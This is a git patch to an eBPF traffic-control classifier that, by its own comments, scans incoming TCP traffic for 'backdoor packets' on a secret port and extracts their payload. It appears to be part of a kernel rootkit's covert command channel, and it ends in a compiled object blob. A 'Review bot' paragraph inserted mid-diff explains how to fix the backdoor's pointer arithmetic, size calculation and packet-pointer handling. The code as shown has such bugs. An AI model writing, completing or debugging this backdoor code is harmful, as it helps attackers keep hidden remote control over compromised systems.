From e8abc7415a5ad27683315abbbc5d905c18c26576 Mon Sep 17 00:00:00 2001
From: h3xduck
Date: Thu, 14 Apr 2022 07:54:21 -0400
Subject: [PATCH] Advancements on payload recognition. Now proceeding to build protocol

---
 src/ebpf/include/bpf/tc.c | 34 +++++++++++++++++++---------------
 src/tc.o | Bin 2624 -> 3760 bytes
 2 files changed, 19 insertions(+), 15 deletions(-)

diff --git a/src/ebpf/include/bpf/tc.c b/src/ebpf/include/bpf/tc.c
index 8f3eca9..f2bed12 100644
--- a/src/ebpf/include/bpf/tc.c
+++ b/src/ebpf/include/bpf/tc.c
@@ -18,51 +18,55 @@ int classifier(struct __sk_buff *skb){ //We are interested on parsing TCP/IP packets so let's assume we have one //Ethernet header - struct ethhdr *eth_hdr = data; - if ((void *)eth_hdr + sizeof(struct ethhdr) > data_end){ + struct ethhdr *eth = data; + if ((void *)eth + sizeof(struct ethhdr) > data_end){ bpf_printk("ETH\n"); return TC_ACT_OK; } - if(eth_hdr->h_proto != htons(ETH_P_IP)){ + if(eth->h_proto != htons(ETH_P_IP)){ //Not an IP packet bpf_printk("IP\n"); return TC_ACT_OK; } //IP header - struct iphdr *ip_hdr = (struct iphdr*)(data + sizeof(struct ethhdr)); - if ((void *)ip_hdr + sizeof(struct iphdr) > data_end){ - bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip_hdr, data, data_end); + struct iphdr *ip = (struct iphdr*)(data + sizeof(struct ethhdr)); + if ((void *)ip + sizeof(struct iphdr) > data_end){ + bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip, data, data_end); return TC_ACT_OK; } - if(ip_hdr->protocol != IPPROTO_TCP){ + if(ip->protocol != IPPROTO_TCP){ bpf_printk("TCP\n"); return TC_ACT_OK; } //TCP header - struct tcphdr *tcp_hdr = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); - if ((void *)tcp_hdr + sizeof(struct tcphdr) > data_end){ + struct tcphdr *tcp = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); + if ((void *)tcp + sizeof(struct tcphdr) > data_end){ bpf_printk("TCP CHECK\n"); return TC_ACT_OK; } //We now proceed to scan for our backdoor packets - __u16 dest_port = ntohs(tcp_hdr->dest); + __u16 dest_port = ntohs(tcp->dest); if(dest_port != SECRET_PACKET_DEST_PORT){ bpf_printk("PORT CHECK\n"); return TC_ACT_OK; } - //Mark skb buffer readable and writable - //bpf_skb_pull_data(skb, 0); + bpf_printk("Detected bounds: data:%llx, data_end:%llx", data, data_end); + bpf_printk("Detected headers: \n\teth:%llx\n\tip:%llx\n\ttcp:%llx\n", eth, ip, tcp); - __u32 payload_size = ntohs(ip_hdr->tot_len) - (tcp_hdr->doff * 4) - (ip_hdr->ihl * 4); - char* 
payload = (void *)(tcp_hdr + tcp_hdr->doff*4); + //Mark skb buffer readable and writable + + __u32 payload_size = ntohs(ip->tot_len) - (tcp->doff * 4) - (ip->ihl * 4); + bpf_printk("ip_totlen: %u, tcp_doff*4: %u, ip_ihl: %u\n", ntohs(ip->tot_len), tcp->doff*4, ip->ihl*4); + char* payload = (void *)(tcp + tcp->doff*4); if ((void*)payload + payload_size > data_end){ - bpf_printk("PAYLOAD CHECK\n"); + bpf_printk("PAYLOAD CHECK, payload:%llx, payload_size:%llx, data_end:%llx\n", payload, payload_size, data_end); return TC_ACT_OK; } + bpf_skb_pull_data(skb, 0); bpf_printk("PAYLOAD size: %u\n", payload_size); 
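Review bot: `char* payload = (void *)(tcp + tcp->doff*4);` performs the addition on a `struct tcphdr *`, so the offset is scaled by `sizeof(struct tcphdr)` and `payload` lands `doff*4*sizeof(struct tcphdr)` bytes past the header instead of `doff*4`; the cast has to come before the arithmetic, `char *payload = (char *)tcp + tcp->doff * 4;`. The `payload_size` expression on the line above is unsigned and wraps to a huge value when `tot_len` is smaller than the two header lengths, and since `tcp` is located with a fixed `sizeof(struct iphdr)` rather than `ip->ihl * 4`, the offset and the size disagree whenever IP options are present; clamping `payload_size` to the bytes remaining before `data_end` (and rejecting the packet when the headers exceed `tot_len`) would keep the PAYLOAD CHECK comparison meaningful. The added `bpf_skb_pull_data(skb, 0)` is placed after the pointer checks, but per that helper's documentation it invalidates every packet pointer the verifier has already accepted, so `eth`, `ip`, `tcp` and `payload` must be re-derived from `skb->data`/`skb->data_end` and re-checked before any later use (the remainder of classifier is outside this hunk), and the helper's return value is ignored. Minor: `payload_size` is a `__u32` but is printed with `%llx` in the PAYLOAD CHECK message, and the "Detected bounds" message lacks a trailing newline.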
diff --git a/src/tc.o b/src/tc.o index 54c02b5b055177bbe5f77f87d16971e20d749b6f..9fb45e2f303d61477dec3f2d46d34fbeae769c10 100644 GIT binary patch literal 3760 zcmbtWJ!~9R5T5f7wl9G|K*pR5+CZ$JU@mrmAPf?Y9fKoV$|anzpy1f-t?@b=`|MqV zodW?ygpepOagu^6iXu@X7b#+0geVYIN{S#M(HMjfR8SzyeDmJheOc@);7ND$=G&Rs zdGq)7{jtfHT5>ruD@T7&${CbsV0XG7mhCX*S+dciaQCBMM1srO@fz49Uu5xi+)ru+!VZV1qe|G z+q=27wYAG>VvZD&b3KC5l5`3kmjvC zTFSSRs*}d5dX9QH!rP6LDnF^-w@G{^BwluXl^ke~@&TIpzl&vzzwPvs*b7$oLzTL7 zd3x+|m7h_5foIik>BOlrWE_4$GyCv3wf}wM?=s_OtbA7dxhm`pah~mb-kG4)_mzIo}oA=U^B|rhHdWv+Hum$#((w;~Dlhog2=KFZEsZ7kNH3KSzD`izKeF z6%~FHe!F=x$j_7WNd%df$fS7+F5L?=w6Kcl!e=e4i@o4-QTVj}eoo%IB=xr`JmOQU z1Tzp0xv}gxJk31tC2l-B4qmMy`JbPjK4`~bE|uqarf~>r74d#P4t<+%8^EFn*qYn7=DmRh(C@sd|Wc{=$Blsn}s5 z*y(+n|9H7qRNSf@50PUEx!!JhOu?%1^Bw(sNnAZfhzxQcF^+$Wnf z4}T|lP;>LIghxGkg+G(Ln7N65tLr*JzI+yhQS_T#&*8i)d8tIfIXjPB&i#;gYVL}i zM|UNh2kusfIPYmaV-5kI=y$mO(>#`rzBUQ`#L;8?-ktBO7g^?pc#`I$onDc1H9mv| zo>K@iFXZb0{}3N8OP({SAAAg-AR|=x6jg7IKHY=|gcPpjyN>XIXKm8`PFL zYvME8F!~}QX7SZRxB~H~?B)qqjoH6k;%ZS{PLw-$iaOujmD|m};L{C1vxe0tkzu!` z&okOazf10HfzO3$rB0p;_WDHQGa39njbG#8mH{+H-4d~Ju3LMl zaned}X7DKyVmxENr14KPIN(;;&#e8--zO7JJ>W4Z>mmN%Yss6K_Uh+w2j34=jQ!=9 z(xN}4+Q34n5(b_>7x`3N^uwY*Q<+|L&-xU5MURS6ycoNunXa4#og5h%s6400vx*EJ zVa0hg3xo%Y%!|}B`mv@@X;#z2njOq2YybZ*8D<0jjwavz5)`5@GcU-bPtptwcZ5#M6*qD|Awl25Y@u!-?hRb`NAY zP-tinWg%(rnC;FN=ZS15J8k6Q9u%PkH)C*(aL7KL@?z0SU*1ZV$`6Noa?i0a#4}cI2vAritOH17RJ!7vz-@qKT+v^lf)(f3szp&ic zC@hT(3<(eWr+kO{*&k$;-2Qek&}%C@i0f;fE(C~5|I7A2=MY_V|IK)BR~(1# zqVUM`Owb9S6GxYicHMUwev}0TpWEYg3w4Q^2M)brUG{jbtH7aGtjj6is{@~$sGsgv zmwhbL>p+req^OB|Ua|CxrtM^t%ti(VrH;rWM(XBuYu0_ILVrm-J?SK_GuPn|%PmZ+ z`s8}gv;3Tvd=>l3_h7ru0rcDdT9z^Ut*GhImmFw-$j@_z0b#@RI`qn>lwh0-J z9rUx09q0D{*7mDVr4Gl%|J3ByF{Z;`0VQgsUkH7{{f*hy9l}yOLAP@aEj_b7Jf`Fp z0wtH{>7|vY7a5QIEQ{;-j}2HkbNmGN&&ua#m}T;~{>w(X8`?Qoa6k+5^G>jh&$yy zW515vBJ76GI=_@Lhfw-#u2sa3L*MyGo~j;E>E>BleQRwAJ+N6nOl16u3*vvqx4b?` z@0Z04mET0KOp9oq!niNn~pxenz`vQM>5 z0imh56-JlSh^k2xSECD4vq^9%qE1*1shW0@PB6{%#wF0k`1t755k(FwGIod+ub{ag 
zJXU31qz>w3O%G^R)BTzqvy}DzKbO?lz{lC-Z<_wzKeQZJ<&)nE!0^p2j#`l^%uQVk z1ULQkO}&h~{&`_on$`OIGek{ZX-Cr*o}D|5|IQTtZT<0z5*XEThM4#b-Ng%-+c`|M zz8$a8Gxl&D1GC$FZUz5#{Cin